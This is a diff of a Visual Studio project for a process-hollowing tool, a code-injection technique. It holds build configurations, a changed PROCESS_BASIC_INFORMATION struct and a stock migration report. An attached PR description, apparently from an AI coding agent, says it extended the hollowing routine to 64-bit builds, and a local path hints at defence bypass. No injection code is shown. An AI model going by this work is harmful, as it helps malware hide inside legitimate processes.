+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>17.0</VCProjectVersion>
+    <ProjectGuid>{0E0493EE-D2FF-40A8-9563-FD4FFD1431DD}</ProjectGuid>
+    <RootNamespace>ProcessHollowing</RootNamespace>
+    <Keyword>Win32Proj</Keyword>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <PlatformToolset>v143</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup>
+    <_ProjectFileVersion>17.0.36414.14</_ProjectFileVersion>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
+    <IntDir>$(Configuration)\</IntDir>
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
+    <IntDir>$(Platform)\$(Configuration)\</IntDir>
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <OutDir>$(SolutionDir)$(Configuration)\</OutDir>
+    <IntDir>$(Configuration)\</IntDir>
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
+    <IntDir>$(Platform)\$(Configuration)\</IntDir>
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>EditAndContinue</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Console</SubSystem>
+      <TargetMachine>MachineX86</TargetMachine>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Midl>
+      <TargetEnvironment>X64</TargetEnvironment>
+    </Midl>
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Console</SubSystem>
+      <TargetMachine>MachineX64</TargetMachine>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <Optimization>MaxSpeed</Optimization>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Console</SubSystem>
+      <OptimizeReferences>true</OptimizeReferences>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <TargetMachine>MachineX86</TargetMachine>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Midl>
+      <TargetEnvironment>X64</TargetEnvironment>
+    </Midl>
+    <ClCompile>
+      <Optimization>MaxSpeed</Optimization>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Console</SubSystem>
+      <OptimizeReferences>true</OptimizeReferences>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <TargetMachine>MachineX64</TargetMachine>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="PE.cpp" />
+    <ClCompile Include="ProcessHollowing.cpp" />
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="internals.h" />
+    <ClInclude Include="PE.h" />
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <Text Include="ReadMe.txt" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>

--- a/sourcecode/ProcessHollowing/ProcessHollowing.vcxproj.filters
+++ b/sourcecode/ProcessHollowing/ProcessHollowing.vcxproj.filters
@@ -1,0 +1,45 @@
+﻿<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="PE.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="ProcessHollowing.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="stdafx.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="internals.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="PE.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="stdafx.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="targetver.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <Text Include="ReadMe.txt" />
+  </ItemGroup>
+</Project>

--- a/sourcecode/ProcessHollowing/ProcessHollowing.vcxproj.user
+++ b/sourcecode/ProcessHollowing/ProcessHollowing.vcxproj.user
@@ -1,0 +1,4 @@
+﻿<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup />
+</Project>

--- a/sourcecode/ProcessHollowing/internals.h
+++ b/sourcecode/ProcessHollowing/internals.h
@@ -1,9 +1,9 @@
 struct PROCESS_BASIC_INFORMATION {
-	PVOID Reserved1;
-	DWORD PebBaseAddress;
-	PVOID Reserved2[2];
-	DWORD UniqueProcessId;
-	PVOID Reserved3;
+PVOID Reserved1;
+PVOID PebBaseAddress;
+PVOID Reserved2[2];
+ULONG_PTR UniqueProcessId;
+PVOID Reserved3;
 };
 
 typedef NTSTATUS (WINAPI* _NtUnmapViewOfSection)(

--- a/sourcecode/UpgradeLog.htm
+++ b/sourcecode/UpgradeLog.htm
@@ -1,0 +1,288 @@
+﻿<!DOCTYPE html>
+<!-- saved from url=(0014)about:internet -->
+ <html xmlns:msxsl="urn:schemas-microsoft-com:xslt"><head><meta content="en-us" http-equiv="Content-Language" /><meta content="text/html; charset=utf-16" http-equiv="Content-Type" /><title _locID="ConversionReport0">
+          Migration Report
+        </title><style> 
+                    /* Body style, for the entire document */
+                    body
+                    {
+                        background: #F3F3F4;
+                        color: #1E1E1F;
+                        font-family: "Segoe UI", Tahoma, Geneva, Verdana, sans-serif;
+                        padding: 0;
+                        margin: 0;
+                    }
+
+                    /* Header1 style, used for the main title */
+                    h1
+                    {
+                        padding: 10px 0px 10px 10px;
+                        font-size: 21pt;
+                        background-color: #E2E2E2;
+                        border-bottom: 1px #C1C1C2 solid; 
+                        color: #201F20;
+                        margin: 0;
+                        font-weight: normal;
+                    }
+
+                    /* Header2 style, used for "Overview" and other sections */
+                    h2
+                    {
+                        font-size: 18pt;
+                        font-weight: normal;
+                        padding: 15px 0 5px 0;
+                        margin: 0;
+                    }
+
+                    /* Header3 style, used for sub-sections, such as project name */
+                    h3
+                    {
+                        font-weight: normal;
+                        font-size: 15pt;
+                        margin: 0;
+                        padding: 15px 0 5px 0;
+                        background-color: transparent;
+                    }
+
+                    /* Color all hyperlinks one color */
+                    a
+                    {
+                        color: #1382CE;
+                    }
+
+                    /* Table styles */ 
+                    table
+                    {
+                        border-spacing: 0 0;
+                        border-collapse: collapse;
+                        font-size: 10pt;
+                    }
+
+                    table th
+                    {
+                        background: #E7E7E8;
+                        text-align: left;
+                        text-decoration: none;
+                        font-weight: normal;
+                        padding: 3px 6px 3px 6px;
+                    }
+
+                    table td
+                    {
+                        vertical-align: top;
+                        padding: 3px 6px 5px 5px;
+                        margin: 0px;
+                        border: 1px solid #E7E7E8;
+                        background: #F7F7F8;
+                    }
+
+                    /* Local link is a style for hyperlinks that link to file:/// content, there are lots so color them as 'normal' text until the user mouse overs */
+                    .localLink
+                    {
+                        color: #1E1E1F;
+                        background: #EEEEED;
+                        text-decoration: none;
+                    }
+
+                    .localLink:hover
+                    {
+                        color: #1382CE;
+                        background: #FFFF99;
+                        text-decoration: none;
+                    }
+
+                    /* Center text, used in the over views cells that contain message level counts */ 
+                    .textCentered
+                    {
+                        text-align: center;
+                    }
+
+                    /* The message cells in message tables should take up all avaliable space */
+                    .messageCell
+                    {
+                        width: 100%;
+                    }
+
+                    /* Padding around the content after the h1 */ 
+                    #content 
+                    {
+	                    padding: 0px 12px 12px 12px; 
+                    }
+
+                    /* The overview table expands to width, with a max width of 97% */ 
+                    #overview table
+                    {
+                        width: auto;
+                        max-width: 75%; 
+                    }
+
+                    /* The messages tables are always 97% width */
+                    #messages table
+                    {
+                        width: 97%;
+                    }
+
+                    /* All Icons */
+                    .IconSuccessEncoded, .IconInfoEncoded, .IconWarningEncoded, .IconErrorEncoded
+                    {
+                        min-width:18px;
+                        min-height:18px; 
+                        background-repeat:no-repeat;
+                        background-position:center;
+                    }
+
+                    /* Success icon encoded */
+                    .IconSuccessEncoded
+                    {
+                        /* Note: Do not delete the comment below. It is used to verify the correctness of the encoded image resource below before the product is released */
+                        /* [---XsltValidateInternal-Base64EncodedImage:IconSuccess#Begin#background-image: url(data:image/png;base64,#Separator#);#End#] */
+                        background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABcElEQVR4Xq2TsUsCURzHv15g8ZJcBWlyiYYgCIWcb9DFRRwMW5TA2c0/QEFwFkxxUQdxVlBwCYWOi6IhWgQhBLHJUCkhLr/BW8S7gvrAg+N+v8/v+x68Z8MGy+XSCyABQAXgBgHGALoASkIIDWSLeLBetdHryMjd5IxQPWT4rn1c/P7+xxp72Cs9m5SZ0Bq2vPnbPFafK2zDvmNHypdC0BPkLlQhxJsCAhQoZwdZU5mwxh720qGo8MzTxTTKZDPCx2HoVzp6lz0Q9tKhyx0kGs8Ny+TkWRKk8lCROwEduhyg9l/6lunOPSfmH3NUH6uQ0KHLAe7JYvJjevm+DAMGJHToKtigE+vwvIidxLamb8IBY9e+C5LiXREkfho3TSd06HJA13/oh6T51MTsfQbHrsMynQ5dDihFjiK8JJAU9AKIWTp76dCVN7HWHrajmUEGvyF9nkbAE6gLIS7kTUyuf2gscLoJrElZo/Mvj+nPz/kLTmfnEwP3tB0AAAAASUVORK5CYII=);
+                    }
+
+                    /* Information icon encoded */
+                    .IconInfoEncoded
+                    {
+                        /* Note: Do not delete the comment below. It is used to verify the correctness of the encoded image resource below before the product is released */
+                        /* [---XsltValidateInternal-Base64EncodedImage:IconInformation#Begin#background-image: url(data:image/png;base64,#Separator#);#End#] */
+                        background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAABHElEQVR4Xs2TsUoDQRRF7wwoziokjZUKadInhdhukR9YP8DMX1hYW+QvdsXa/QHBbcXC7W0CamWTQnclFutceIQJwwaWNLlwm5k5d94M76mmaeCrrmsLYOocY12FcxZFUeozCqKqqgYA8uevv1H6VuPxcwlfk5N92KHBxfFeCSAxxswlYAW/Xr989x/mv9gkhtyMDhcAxgzRsp7flj8B/HF1RsMXq+NZMkopaHe7lbKxQUEIGbKsYNoGn969060hZBkQex/W8oRQwsQaW2o3Ago2SVcJUzAgY3N0lTCZZm+zPS8HB51gMmS1DEYyOz9acKO1D8JWTlafKIMxdhvlfdyT94Vv5h7P8Ky7nQzACmhvKq3zk3PjW9asz9D/1oigecsioooAAAAASUVORK5CYII=);
+                    }
+
+                    /* Warning icon encoded */
+                    .IconWarningEncoded
+                    {
+                        /* Note: Do not delete the comment below. It is used to verify the correctness of the encoded image resource below before the product is released */
+                        /* [---XsltValidateInternal-Base64EncodedImage:IconWarning#Begin#background-image: url(data:image/png;base64,#Separator#);#End#] */
+                        background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAx0lEQVR4XpWSMQ7CMAxFf4xAyBMLCxMrO8dhaBcuwdCJS3RJBw7SA/QGTCxdWJgiQYWKXJWKIXHIlyw5lqr34tQgEOdcBsCOx5yZK3hCCKdYXneQkh4pEfqzLfu+wVDSyyzFoJjfz9NB+pAF+eizx2Vruts0k15mPgvS6GYvpVtQhB61IB/dk6AF6fS4Ben0uIX5odtFe8Q/eW1KvFeH4e8khT6+gm5B+t3juyDt7n0jpe+CANTd+oTUjN/U3yVaABnSUjFz/gFq44JaVSCXeQAAAABJRU5ErkJggg==);
+                    }
+
+                    /* Error icon encoded */
+                    .IconErrorEncoded
+                    {
+                        /* Note: Do not delete the comment below. It is used to verify the correctness of the encoded image resource below before the product is released */
+                        /* [---XsltValidateInternal-Base64EncodedImage:IconError#Begin#background-image: url(data:image/png;base64,#Separator#);#End#] */
+                        background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAABQElEQVR4XqWTvUoEQRCE6wYPZUA80AfwAQz23uCMjA7MDRQEIzPBVEyNTQUFIw00vcQTTMzuAh/AxEQQT8HF/3G/oGGnEUGuoNnd6qoZuqltyKEsyzVJq5I6rnUp6SjGeGhESikzzlc1eL7opfuVbrqbU1Zw9NCgtQMaZpY0eNnaaL2fHusvTK5vKu7sjSS1Y4y3QUA6K3e3Mau5UFDyMP7tYF9o8cAHZv68vipoIJg971PZIZ5HiwdvYGGvFVFHmGmZ2MxwmQYPXubPl9Up0tfoMQGetXd6mRbvhBw+boZ6WF7Mbv1+GsHRk0fQmPAH1GfmZirbCfDJ61tw3Px8/8pZsPAG4jlVhcPgZ7adwNWBB68lkRQWFiTgFlbnLY3DGGM7izIJIyT/jjIvEJw6fdJTc6krDzh6aMwMP9bvDH4ADSsa9uSWVJkAAAAASUVORK5CYII=);
+                    }
+                 </style><script type="text/javascript" language="javascript"> 
+          
+            // Startup 
+            // Hook up the the loaded event for the document/window, to linkify the document content
+            var startupFunction = function() { linkifyElement("messages"); };
+            
+            if(window.attachEvent)
+            {
+              window.attachEvent('onload', startupFunction);
+            }
+            else if (window.addEventListener) 
+            {
+              window.addEventListener('load', startupFunction, false);
+            }
+            else 
+            {
+              document.addEventListener('load', startupFunction, false);
+            } 
+            
+            // Toggles the visibility of table rows with the specified name 
+            function toggleTableRowsByName(name)
+            {
+               var allRows = document.getElementsByTagName('tr');
+               for (i=0; i < allRows.length; i++)
+               {
+                  var currentName = allRows[i].getAttribute('name');
+                  if(!!currentName && currentName.indexOf(name) == 0)
+                  {
+                      var isVisible = allRows[i].style.display == ''; 
+                      isVisible ? allRows[i].style.display = 'none' : allRows[i].style.display = '';
+                  }
+               }
+            }
+            
+            function scrollToFirstVisibleRow(name) 
+            {
+               var allRows = document.getElementsByTagName('tr');
+               for (i=0; i < allRows.length; i++)
+               {
+                  var currentName = allRows[i].getAttribute('name');
+                  var isVisible = allRows[i].style.display == ''; 
+                  if(!!currentName && currentName.indexOf(name) == 0 && isVisible)
+                  {
+                     allRows[i].scrollIntoView(true); 
+                     return true; 
+                  }
+               }
+               
+               return false;
+            }
+            
+            // Linkifies the specified text content, replaces candidate links with html links 
+            function linkify(text)
+            {
+                 if(!text || 0 === text.length)
+                 {
+                     return text; 
+                 }
+
+                 // Find http, https and ftp links and replace them with hyper links 
+                 var urlLink = /(http|https|ftp)\:\/\/[a-zA-Z0-9\-\.]+(:[a-zA-Z0-9]*)?\/?([a-zA-Z0-9\-\._\?\,\/\\\+&%\$#\=~;\{\}])*/gi;
+                 
+                 return text.replace(urlLink, '<a href="$&">$&</a>') ;
+            }
+            
+            // Linkifies the specified element by ID
+            function linkifyElement(id)
+            {
+                var element = document.getElementById(id);
+                if(!!element)
+                {
+                  element.innerHTML = linkify(element.innerHTML); 
+                }
+            }
+            
+            function ToggleMessageVisibility(projectName)
+            {
+              if(!projectName || 0 === projectName.length)
+              {
+                return; 
+              }
+              
+              toggleTableRowsByName("MessageRowClass" + projectName);
+              toggleTableRowsByName('MessageRowHeaderShow' + projectName);
+              toggleTableRowsByName('MessageRowHeaderHide' + projectName); 
+            }
+            
+            function ScrollToFirstVisibleMessage(projectName)
+            {
+              if(!projectName || 0 === projectName.length)
+              {
+                return; 
+              }
+              
+              // First try the 'Show messages' row
+              if(!scrollToFirstVisibleRow('MessageRowHeaderShow' + projectName))
+              {
+                // Failed to find a visible row for 'Show messages', try an actual message row 
+                scrollToFirstVisibleRow('MessageRowClass' + projectName); 
+              }
+            }
+           </script></head><body><h1 _locID="ConversionReport">
+          Migration Report - ProcessHollowing</h1><div id="content"><h2 _locID="OverviewTitle">Overview</h2><div id="overview"><table><tr><th></th><th _locID="ProjectTableHeader">Project</th><th _locID="PathTableHeader">Path</th><th _locID="ErrorsTableHeader">Errors</th><th _locID="WarningsTableHeader">Warnings</th><th _locID="MessagesTableHeader">Messages</th></tr><tr><td class="IconWarningEncoded" /><td><strong><a href="#HelloWorld">HelloWorld</a></strong></td><td>HelloWorld\HelloWorld.vcproj</td><td class="textCentered"><a>0</a></td><td class="textCentered"><a href="#HelloWorldWarning">1</a></td><td class="textCentered"><a href="#" onclick="ScrollToFirstVisibleMessage('HelloWorld'); return false;">2</a></td></tr><tr><td class="IconWarningEncoded" /><td><strong><a href="#ProcessHollowing">ProcessHollowing</a></strong></td><td>ProcessHollowing\ProcessHollowing.vcproj</td><td class="textCentered"><a>0</a></td><td class="textCentered"><a href="#ProcessHollowingWarning">1</a></td><td class="textCentered"><a href="#" onclick="ScrollToFirstVisibleMessage('ProcessHollowing'); return false;">2</a></td></tr><tr><td class="IconWarningEncoded" /><td><strong><a href="#Solution"><span _locID="OverviewSolutionSpan">Solution</span></a></strong></td><td>ProcessHollowing.sln</td><td class="textCentered"><a>0</a></td><td class="textCentered"><a href="#SolutionWarning">1</a></td><td class="textCentered"><a href="#" onclick="ScrollToFirstVisibleMessage('Solution'); return false;">2</a></td></tr></table></div><h2 _locID="SolutionAndProjectsTitle">Solution and projects</h2><div id="messages"><a name="HelloWorld" /><h3>HelloWorld</h3><table><tr id="HelloWorldHeaderRow"><th></th><th class="messageCell" _locID="MessageTableHeader">Message</th></tr><tr name="WarningRowClassHelloWorld"><td class="IconWarningEncoded"><a name="HelloWorldWarning" /></td><td class="messageCell"><strong>HelloWorld\HelloWorld.vcproj:
+        </strong><span>VCWebServiceProxyGeneratorTool is no longer supported. The tool has been removed from your project settings.</span></td></tr><tr name="MessageRowHeaderShowHelloWorld"><td class="IconInfoEncoded" /><td class="messageCell"><a _locID="ShowAdditionalMessages" href="#" name="HelloWorldMessage" onclick="ToggleMessageVisibility('HelloWorld'); return false;">
+          Show 2 additional messages
+        </a></td></tr><tr name="MessageRowClassHelloWorld" style="display: none"><td class="IconInfoEncoded"><a name="HelloWorldMessage" /></td><td class="messageCell"><strong>HelloWorld\HelloWorld.vcproj:
+        </strong><span>Converting project file 'D:\projeto_Meus\novos_bypass\Process-Hollowing\sourcecode\HelloWorld\HelloWorld.vcproj'.</span></td></tr><tr name="MessageRowClassHelloWorld" style="display: none"><td class="IconInfoEncoded"><a name="HelloWorldMessage" /></td><td class="messageCell"><strong>HelloWorld\HelloWorld.vcproj:
+        </strong><span>Done converting to new project file 'D:\projeto_Meus\novos_bypass\Process-Hollowing\sourcecode\HelloWorld\HelloWorld.vcxproj'.</span></td></tr><tr style="display: none" name="MessageRowHeaderHideHelloWorld"><td class="IconInfoEncoded" /><td class="messageCell"><a _locID="HideAdditionalMessages" href="#" name="HelloWorldMessage" onclick="ToggleMessageVisibility('HelloWorld'); return false;">
+          Hide 2 additional messages
+        </a></td></tr></table><a name="ProcessHollowing" /><h3>ProcessHollowing</h3><table><tr id="ProcessHollowingHeaderRow"><th></th><th class="messageCell" _locID="MessageTableHeader">Message</th></tr><tr name="WarningRowClassProcessHollowing"><td class="IconWarningEncoded"><a name="ProcessHollowingWarning" /></td><td class="messageCell"><strong>ProcessHollowing\ProcessHollowing.vcproj:
+        </strong><span>VCWebServiceProxyGeneratorTool is no longer supported. The tool has been removed from your project settings.</span></td></tr><tr name="MessageRowHeaderShowProcessHollowing"><td class="IconInfoEncoded" /><td class="messageCell"><a _locID="ShowAdditionalMessages" href="#" name="ProcessHollowingMessage" onclick="ToggleMessageVisibility('ProcessHollowing'); return false;">
+          Show 2 additional messages
+        </a></td></tr><tr name="MessageRowClassProcessHollowing" style="display: none"><td class="IconInfoEncoded"><a name="ProcessHollowingMessage" /></td><td class="messageCell"><strong>ProcessHollowing\ProcessHollowing.vcproj:
+        </strong><span>Converting project file 'D:\projeto_Meus\novos_bypass\Process-Hollowing\sourcecode\ProcessHollowing\ProcessHollowing.vcproj'.</span></td></tr><tr name="MessageRowClassProcessHollowing" style="display: none"><td class="IconInfoEncoded"><a name="ProcessHollowingMessage" /></td><td class="messageCell"><strong>ProcessHollowing\ProcessHollowing.vcproj:
+        </strong><span>Done converting to new project file 'D:\projeto_Meus\novos_bypass\Process-Hollowing\sourcecode\ProcessHollowing\ProcessHollowing.vcxproj'.</span></td></tr><tr style="display: none" name="MessageRowHeaderHideProcessHollowing"><td class="IconInfoEncoded" /><td class="messageCell"><a _locID="HideAdditionalMessages" href="#" name="ProcessHollowingMessage" onclick="ToggleMessageVisibility('ProcessHollowing'); return false;">
+          Hide 2 additional messages
+        </a></td></tr></table><a name="Solution" /><h3 _locID="ProjectDisplayNameHeader">Solution</h3><table><tr id="SolutionHeaderRow"><th></th><th class="messageCell" _locID="MessageTableHeader">Message</th></tr><tr name="WarningRowClassSolution"><td class="IconWarningEncoded"><a name="SolutionWarning" /></td><td class="messageCell"><strong>ProcessHollowing.sln:
+        </strong><span>Visual Studio needs to make non-functional changes to this project in order to enable the project to open in released versions of Visual Studio newer than Visual Studio 2010 SP1 without impacting project behavior.</span></td></tr><tr name="MessageRowHeaderShowSolution"><td class="IconInfoEncoded" /><td class="messageCell"><a _locID="ShowAdditionalMessages" href="#" name="SolutionMessage" onclick="ToggleMessageVisibility('Solution'); return false;">
+          Show 2 additional messages
+        </a></td></tr><tr name="MessageRowClassSolution" style="display: none"><td class="IconInfoEncoded"><a name="SolutionMessage" /></td><td class="messageCell"><strong>ProcessHollowing.sln:
+        </strong><span>File successfully backed up as D:\projeto_Meus\novos_bypass\Process-Hollowing\sourcecode\Backup\ProcessHollowing.sln</span></td></tr><tr name="MessageRowClassSolution" style="display: none"><td class="IconInfoEncoded"><a name="SolutionMessage" /></td><td class="messageCell"><strong>ProcessHollowing.sln:
+        </strong><span>Solution migrated successfully</span></td></tr><tr style="display: none" name="MessageRowHeaderHideSolution"><td class="IconInfoEncoded" /><td class="messageCell"><a _locID="HideAdditionalMessages" href="#" name="SolutionMessage" onclick="ToggleMessageVisibility('Solution'); return false;">
+          Hide 2 additional messages
+        </a></td></tr></table></div></div></body></html>


### PR DESCRIPTION
## Summary
- update the core process hollowing routine to use pointer-sized math, relocation handling, and thread context updates that work for 32- and 64-bit builds
- modernize the PE utilities to expose architecture-aware headers and keep remote image data alive while refactoring PROCESS_BASIC_INFORMATION for pointer-sized fields
- add x64 build configurations to both the ProcessHollowing and HelloWorld projects as well as the solution

## Testing
- not run (not requested)

------
https://chatgpt.com/codex/tasks/task_e_68d67456749083309b6d1d3d694b8172